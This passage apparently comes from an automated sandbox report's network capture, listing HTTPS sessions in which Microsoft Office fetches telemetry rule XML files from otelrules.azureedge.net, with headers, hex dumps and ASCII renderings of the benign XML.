                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              102192.168.2.64984413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:56 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:56 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:56 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1360
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                              ETag: "0x8DC582BDDEB5124"
                                                                                                              x-ms-request-id: a14128ec-001e-005a-6ec7-45c3d0000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093856Z-1746fd949bddtfvqhC1EWRxbpg00000002f0000000003rr9
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:56 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              103192.168.2.64984513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:58 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:58 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:58 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1403
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                              ETag: "0x8DC582BDCB4853F"
                                                                                                              x-ms-request-id: e40b0455-101e-008e-19d2-45cf88000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093858Z-1746fd949bdb8xvchC1EWRmbd400000002bg000000009xe7
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:58 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              104192.168.2.64984613.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:58 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:59 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:59 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1366
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                              ETag: "0x8DC582BDB779FC3"
                                                                                                              x-ms-request-id: f7184125-501e-0064-68d4-451f54000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093859Z-1746fd949bd2cq7chC1EWRnx9g000000027000000000206q
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:59 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              105192.168.2.64984713.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:58 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:59 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:59 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1397
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                              ETag: "0x8DC582BDFD43C07"
                                                                                                              x-ms-request-id: 8863b02e-001e-008d-5ccb-45d91e000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093859Z-1746fd949bdxk6n6hC1EWRdr8c00000002bg00000000553e
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:59 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              106192.168.2.64984813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:58 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:59 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:59 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1360
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                              ETag: "0x8DC582BDD74D2EC"
                                                                                                              x-ms-request-id: 0cb9a159-001e-0079-71ce-4512e8000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093859Z-1746fd949bdfg4slhC1EWR34t0000000029g0000000082bg
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:59 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              107192.168.2.64984913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:58 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:59 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:59 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1427
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                              ETag: "0x8DC582BE56F6873"
                                                                                                              x-ms-request-id: 626f3694-401e-0015-30d1-450e8d000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093859Z-1746fd949bd6ztf6hC1EWRvq2s000000022000000000884x
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:59 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              108192.168.2.64985013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:00 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:00 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:00 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1390
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                              ETag: "0x8DC582BE3002601"
                                                                                                              x-ms-request-id: d954f12c-201e-000c-55cb-4579c4000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093900Z-1746fd949bd77mkmhC1EWR5efc00000002ug000000002twr
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:00 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              109192.168.2.64985113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:01 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:01 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:01 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1401
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                              ETag: "0x8DC582BE2A9D541"
                                                                                                              x-ms-request-id: 4f685411-201e-0033-27cc-45b167000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093901Z-1746fd949bdlqd7fhC1EWR6vt000000002k00000000099sw
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:01 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              110192.168.2.64985213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:01 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:01 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:01 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1364
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                              ETag: "0x8DC582BEB6AD293"
                                                                                                              x-ms-request-id: 0db49ca6-a01e-001e-68d9-4549ef000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093901Z-1746fd949bdtlp5chC1EWRq1v400000002gg000000002acn
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:01 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              111192.168.2.64985313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:01 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:01 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:01 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1391
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                              ETag: "0x8DC582BDF58DC7E"
                                                                                                              x-ms-request-id: e8edde3b-801e-0083-79cc-45f0ae000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093901Z-1746fd949bdlqd7fhC1EWR6vt000000002tg000000000e4e
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:01 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              112192.168.2.64985413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:01 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:01 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:01 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1354
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                              ETag: "0x8DC582BE0662D7C"
                                                                                                              x-ms-request-id: 8dafbd59-c01e-0034-0bce-452af6000000
